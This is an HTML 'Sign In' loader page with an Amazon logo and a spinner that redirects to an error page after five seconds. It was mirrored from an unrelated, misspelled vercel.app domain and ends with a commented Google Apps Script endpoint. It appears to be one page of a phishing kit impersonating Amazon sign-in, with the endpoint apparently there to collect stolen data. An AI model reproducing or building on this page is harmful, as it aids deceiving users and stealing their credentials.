<!DOCTYPE html>
<html lang="en">
<meta http-equiv="content-type" content="text/html;charset=utf-8" />
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="refresh" content="5; url=error.html">
    <title>Sign In</title>
    <link rel="stylesheet" href="../cdnjs.cloudflare.com/ajax/libs/bootstrap/5.3.3/css/bootstrap.min.css"
        integrity="sha512-jnSuA4Ss2PkkikSOLtYs8BlYIeeIK1h99ty4YfvRPAlzr377vr3CXDb7sb7eEEBYjDtcYj+AjBH3FLv5uSJuXg=="
        crossorigin="anonymous" referrerpolicy="no-referrer" />
    <style type="text/css">
        @import url('https://fonts.googleapis.com/css2?family=Poppins:ital,wght@0,100;0,200;0,300;0,400;0,500;0,600;0,700;0,800;0,900;1,100;1,200;1,300;1,400;1,500;1,600;1,700;1,800;1,900&amp;display=swap');
        * {
            font-family: "Poppins", sans-serif;
            margin: 0;
            padding: 0;
            box-sizing: border-box;
            overflow: hidden;
        }

        body {
            background-color: #f2f3f3;
        }

        .container {
            position: absolute;
            top: 50%;
            left: 50%;
            transform: translate(-50%, -50%);
            background: #fff;
            width: 450px;
            height: 460px;
            border: 1px #a0a0a0 solid;
            display: flex;
            flex-direction: column;
            justify-content: center;
            align-items: center;
            border-radius: 8px;
        }

        .box,
        .box button {
            display: flex;
            align-items: center;
        }

        .box {
            flex-direction: column;
            justify-content: space-evenly;
        }

        .box button {
            width: 300px;
            height: 40px;
            background-color: #fff;
            outline: none;
            font-weight: bold;
            border: 1px solid rgb(211, 210, 210);
            border-radius: 20px;
            justify-content: center;
            cursor: pointer;
        }

        .box-one button img {
            margin: 0 0.5rem;
        }

        .box-one i {
            color: #00acee;
            font-size: 1.8rem;
        }

        .box-two input {
            position: relative;
            width: 350px;
            height: 48px;
            outline: none;
            border: 1px solid rgb(83 83 83);
            border-radius: 4px;
            padding-left: 10px;
        }

        .box-two input label {
            position: absolute;
            top: 0;
        }

        .box-two input::placeholder {
            font-size: 1rem;
        }

        .box-two input:focus {
            border: 1px solid #00acee;
        }

        .box-two .next-btn {
            background-color: #370596;
            color: #fff;
        }

        .container p {
            font-size: 1.3rem;
            color: rgb(138, 136, 136);
        }

        .container p a {
            text-decoration: none;
            color: #00acee;
        }

        @media only screen and (max-width: 400px) {
            .containerd {
                margin-top: -2em;
            }

            .containerd h3 {
                font-size: 17px;
            }
        }
    </style>
</head>

<body>
    <div class="div" style="background: #fff; padding: 8px;">
        <div class="row">
            <div class="col-md-2">
                <img src="https://upload.wikimedia.org/wikipedia/commons/a/a9/Amazon_logo.svg" class="img-responsive" style="width:120px;">
            </div>
        </div>
    </div>

    <div class="container">
        <div class="row">
            <div class="col-md-12">
                <div class="loader-overlay">
                    <img src="imgs/Spin@.gif" alt="Loading..............." />
                </div>
                <!-- <img src="imgs/Spinner@.gif" alt="" srcset=""> -->
            </div>
        </div>
    </div>
</body>
<script src="../cdnjs.cloudflare.com/ajax/libs/bootstrap/5.3.3/js/bootstrap.min.js"
    integrity="sha512-ykZ1QQr0Jy/4ZkvKuqWn4iF3lqPZyij9iRv6sGqLRdTPkY69YX6+7wvVGmsdBbiIfN/8OdsI7HABjvEok6ZopQ=="
    crossorigin="anonymous" referrerpolicy="no-referrer"></script>


<!-- Mirrored from fidelitesinvust.vercel.app/loader.html by HTTrack Website Copier/3.x [XR&CO'2014], Thu, 24 Oct 2024 15:56:55 GMT -->
</html>

<!-- https://script.google.com/macros/s/AKfycbzBX74xARleKS_PBUl-_IYTAyyhQHm8pBtbjuuLEjwS0bx6Dg0uchUhQmkSu-6h-N64NA/exec -->